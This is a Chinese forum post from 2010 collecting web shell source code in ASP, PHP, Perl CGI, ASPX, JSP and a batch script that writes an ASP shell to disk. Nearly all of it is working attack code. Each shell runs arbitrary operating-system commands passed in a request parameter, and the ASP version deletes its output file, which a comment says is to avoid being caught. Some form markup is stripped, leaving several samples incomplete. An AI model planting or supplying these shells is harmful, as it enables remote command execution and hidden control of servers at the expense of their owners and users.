Cmd Shell ASP/ASPX/JSP/PHP/CGI

2010-1-31 07:51| 发布者: admin| 查看: 24| 评论: 0|原作者: 情殇

Cmd Shell ASP版本执行命令:

<%
Dim oScript
Dim oScriptnet
Dim oFileSys, oFile
Dim szCMD,szTempFile
szCMD=request.form(".cmd")
'从输入框得到cmd
On Error Resume Next
'如果出现错误，直接跳过，防止弹出错误窗口
set oScript=server.createobject("WSCRIPT.SHELL")
'建立shell(wshshell)对象
set oFileSys=server.createobject("scripting.filesystemobject")
szTempFile="C:\"& oFileSys.GetTempName()
'GetTempName()是fso建立临时文件的一种方法
Call oScript.Run ("cmd.exe /c "& szCMD &">" &szTempFile,0,true)
'调用wshshell函数的run来执行命令，并把它重定向到临时文件夹中
set oFile=oFileSys.OpenTextFile(szTempFile,1,False,0)
'以读的方式打开临时文件
%>


<%
On Error Resume Next
response.write server.HTMLEncode(oFile.ReadAll)
'输出编码后的文件内容
oFile.close
'关闭文件
call oFileSys.DeleteFile(szTempFile,True)
'防止被抓住所以删除文件
%>




Cmd Shell PHP版本1
cmd.php 
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!"); 
$exec=$phpwsh->exec("cmd.exe /c ".$_GET['cmd'].""); 
$stdout = $exec->StdOut(); 
$stroutput = $stdout->ReadAll(); 
echo $stroutput; 
?> 
用法:http://127.0.0.1/cmd.php?cmd=ver


Cmd Shell PHP版本2


CMD命令行PHP版

CMD命令行PHP版
by heiyeluren




 




if(empty($cmd)) { //判断有没有输入命令
echo "没有输入任何命令!"; 
} elseif(!is_string($cmd)) { //判断变量是不是字符
echo "你输入的不是命令,请重新输入!"; 
} else {
echo `$cmd`; //执行获得的变量(命令)
}
?>





Cmd Shell PHP版本3

Command: 



   if(isset($cmd)) {
       system($cmd);
   }
?>
 



Cmd Shell CGI版本1
use CGI qw(:standard);
print header(-charset=>gb2312);
$cmd=param("cmd");
$out=`$cmd 2>&1`;
print start_form,textfield("cmd",$cmd,60);
print end_form;
print pre($out);


Cmd Shell CGI版本2
#!/usr/bin/perl

require "cgi-lib.pl";

print &PrintHeader;
print "\n";
print "\n";
print "\n";
print "\n";

&ReadParse(*in);

if($in{'cmd'} ne "") {
   print "\n$in{'cmd'}\n\n";
   print `/bin/bash -c "$in{'cmd'}"`;
   print "
\n"; 
}



Cmd Shell ASPX版本
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>



   awen asp.net webshell  


      
    
    
    输入命令：
   






Cmd Shell JSP版本





<%@ page import="java.io.*" %>
<%
   String cmd = request.getParameter("cmd");
   String output = "";

   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec(cmd);
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) {
            output += s;
         }
      }
      catch(IOException e) {
         e.printStackTrace();
      }
   }
%>


<%=output %>




Cmd Shell Bat版本
echo ^<^% > cmdasp.asp
echo Dim oScript, oScriptNet, oFileSys, oFile, szCMD, szTempFile >> cmdasp.asp
echo On Error Resume Next >> cmdasp.asp
echo Set oScript = Server.CreateObject(^"WSCRIPT.SHELL^") >> cmdasp.asp
echo Set oScriptNet = Server.CreateObject(^"WSCRIPT.NETWORK^") >> cmdasp.asp
echo Set oFileSys = Server.CreateObject(^"Scripting.FileSystemObject^")
     >> cmdasp.asp
echo szCMD = Request.Form(^".CMD^") >> cmdasp.asp
echo If (szCMD ^<^> ^"^") Then >> cmdasp.asp
echo szTempFile = ^"C:\^" & oFileSys.GetTempName() >> cmdasp.asp
echo Call oScript.Run(^"cmd.exe /c ^" ^& szCMD ^& ^" ^> ^" ^& szTempFile,0,True)
     >> cmdasp.asp
echo Set oFle = oFileSys.OpenTextFile(szTempFile,1,False,0) >> cmdasp.asp
echo End If >> cmdasp.asp
echo ^%^> >> cmdasp.asp
echo ^^" method=^"POST^"^>
     >> cmdasp.asp
echo ^^"^> >> cmdasp.asp
echo ^ >> cmdasp.asp
echo ^ >> cmdasp.asp
echo ^ >> cmdasp.asp
echo ^<^% >> cmdasp.asp
echo If (IsObject(oFile)) Then >> cmdasp.asp
echo On Error Resume Next >> cmdasp.asp
echo Response.Write Server.HTMLEncode(oFile.ReadAll) >> cmdasp.asp
echo oFile.Close >> cmdasp.asp
echo Call oFileSys.DeleteFile(szTempFile, True) >> cmdasp.asp
echo End If >> cmdasp.asp
echo ^%^> >> cmdasp.asp
echo ^<^/PRE^> >> cmdasp.asp

收藏分享邀请

		自动登录	找回密码
密码			注册

Cmd Shell ASP/ASPX/JSP/PHP/CGI

最新评论

相关分类